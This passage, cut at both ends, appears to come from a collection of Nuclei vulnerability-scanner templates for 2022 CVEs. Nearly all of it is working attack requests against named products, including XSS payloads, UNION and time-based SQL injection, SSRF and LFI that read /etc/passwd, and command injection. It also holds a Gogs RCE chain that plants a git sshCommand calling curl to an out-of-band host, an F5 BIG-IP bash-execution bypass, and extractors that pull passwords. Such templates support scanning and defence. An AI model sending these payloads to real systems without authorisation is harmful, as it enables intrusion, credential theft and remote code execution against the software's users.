Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\ud83e\udd9e\":\"test\"}"],"headers":{"X-Requested-With":"XMLHttpRequest"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"Session Expired\"}"]},{"type":"word","part":"header","words":["Server: xxxx"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40359","info":{"name":"Kae's File Manager <=1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","x_kfm_changeCaption","kfm_copyFiles"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32025","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}%23&password={{password}}\n","GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0415","info":{"name":"Gogs <0.12.6 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/upload-file HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Requested-With: XMLHttpRequest\nX-Csrf-Token: {{auth_csrf}}\nContent-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395\n\n-----------------------------313811965223810628771946318395\nContent-Disposition: form-data; name=\"file\"; filename=\"config\"\nContent-Type: application/octet-stream\n\n[core]\n    repositoryformatversion = 0\n    filemode = true\n    bare = false\n    logallrefupdates = true\n    ignorecase = true\n    precomposeunicode = true\n    sshCommand = curl http://{{interactsh-url}} -I\n[remote \"origin\"]\n    url = git@github.com:torvalds/linux.git\n    fetch = +refs/heads/*:refs/remotes/origin/*\n[branch \"master\"]\n    remote = origin\n    merge = refs/heads/master\n-----------------------------313811965223810628771946318395--\n","POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"uuid","group":1,"regex":[" \"uuid\": \"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-46888","info":{"name":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?secret=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\">","NexusPHP"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0147","info":{"name":"WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'","toplevel_page_wp-gdpr-compliance"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36883","info":{"name":"Jenkins Git <=4.11.3 - Missing Authorization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository:","SCM API plugin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2290","info":{"name":"Trilium <0.52.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No handler matched for custom <img src=x onerror=alert(document.domain)>","Note '<img src=x onerror=alert(document.domain)>' not found"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-1815","info":{"name":"Drawio <18.1.2 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /service/0/test.oast.me HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-24899","info":{"name":"Contao <4.13.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","\"Not authenticated\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-24264","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearch_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}","td_available_languages"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1439","info":{"name":"Microweber <1.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class='x module module-'onmouseover=alert(document.domain) '","parent-module-id"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2185","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778","a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-28117","info":{"name":"Navigate CMS 2.9.4 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-username\"\n\n{{username}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf_token}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-password\"\n\n{{password}}\n-----------------------------123456789012345678901234567890\n","POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlimit=5&language=en&url=file:///etc/passwd\n","GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrf_token\" value=\"([a-f0-9]{64})"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-4325","info":{"name":"WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<script>alert(`document.domain`)</script>\")","contains(body_2, \"Post Status Notifier Lite\")"],"condition":"and"}]}]},{"id":"CVE-2022-1007","info":{"name":"WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, '<script>alert(document.domain)</script>')","contains(body_2, 'advanced-booking-calendar')","contains(header_2, 'text/html')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-2187","info":{"name":"WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\"></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","Contact Form 7"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0773","info":{"name":"Documentor <= 1.5.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)\n","GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(content_type_1, \"text/html\")","contains(body_1, \"([])\") && contains(body_2, \".documentor-help\")"],"condition":"and"}]}]},{"id":"CVE-2022-23178","info":{"name":"Crestron Device - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/aj.html?a=devi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uname\":","\"upassword\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29007","info":{"name":"Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /dfsms/add-category.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Add Product</title>","<span>Admin","DFSMS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40022","info":{"name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /controller/ping.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/controller/ping.php\n\ncurrentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+)"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-43169","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-33174","info":{"name":"Powertek Firmware <3.30.30 - Authorization Bypass","severity":"high"},"requests":[{"raw":["GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\nHost: {{Hostname}}\nCookie: tmpToken=;\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<sys.passwd>","<sys.su.name>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<sys\\.passwd>([A-Z0-9a-z]+)<\\/sys\\.passwd>","<sys\\.su\\.name>([a-z]+)<\\/sys\\.su\\.name>"],"part":"body"}]}]},{"id":"CVE-2022-0747","info":{"name":"Infographic Maker iList < 4.3.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)\n","GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200","contains(content_type_2, \"text/javascript\")","contains(body_2, \"show_ilist_templates\")"],"condition":"and"}]}]},{"id":"CVE-2022-22733","info":{"name":"Apache ShardingSphere ElasticJob-UI privilege escalation","severity":"medium"},"requests":[{"raw":["POST /api/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccess-Token:\nContent-Type: application/json;charset=UTF-8\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n{\"username\":\"guest\",\"password\":\"guest\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"isGuest\":true","\"accessToken\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32015","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-35405","info":{"name":"Zoho ManageEngine - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{RootURL}}/xmlrpc"],"body":"<?xml version=\"1.0\"?><methodCall><methodName>{{randstr}}</methodName><params><param><value>big0us</value></param></params></methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>faultString</name>"]},{"type":"word","part":"body","words":["No such service [{{randstr}}]","No such handler: {{randstr}}"],"condition":"or"},{"type":"word","part":"body","words":["<methodResponse>","</methodResponse>"],"condition":"or"}]}]},{"id":"CVE-2022-24384","info":{"name":"SmarterTools SmarterTrack - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n\n"],"matchers":[{"type":"word","words":["\"type\":\"error\",\"text\":\"Unknown survey\\\"><img src=x onerror=alert(document.domain)>\"","smartertrack"],"condition":"and"}]}]},{"id":"CVE-2022-47945","info":{"name":"Thinkphp Lang - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?lang=../../thinkphp/base","{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Call Stack","class=\"trace"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1388","info":{"name":"F5 BIG-IP iControl - REST Auth Bypass RCE","severity":"critical"},"requests":[{"raw":["POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: localhost\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["commandResult","8831-2202-EVC"],"condition":"and"}]}]},{"id":"CVE-2022-34047","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /set_safety.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-26564","info":{"name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>","{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1","{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>javascript:alert('XSS')</script>","HotelDruid"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29014","info":{"name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ubus/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22242","info":{"name":"Juniper Web Device Manager - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","The requested resource is not authorized to view"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0281","info":{"name":"Microweber Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/users/search_authors"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"display_name\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21500","info":{"name":"Oracle E-Business Suite <=12.2 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp"],"matchers-condition":"and","matchers":[{"type":"word","words":["Registration","Register as individual","<!-- ibeCZzpRuntimeIncl.jsp end -->"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31798","info":{"name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[",\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31978","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_inquiry HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-1916","info":{"name":"WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["woot-content-in-popup","woot-system","woot-table"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31269","info":{"name":"Linear eMerge E3-Series - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID=","Password="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password='(.+?)'"]}]}]},{"id":"CVE-2022-0827","info":{"name":"WordPress Best Books <=2.6.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"Account added successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-4260","info":{"name":"WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\nHost: {{Hostname}}\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n","GET / HTTP/1.1\nHost: {{Hostname}}\nReferer: XSS\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_4, \"<script>alert(document.domain);</script>\")","contains(content_type_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1329","info":{"name":"Elementor Website Builder - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php 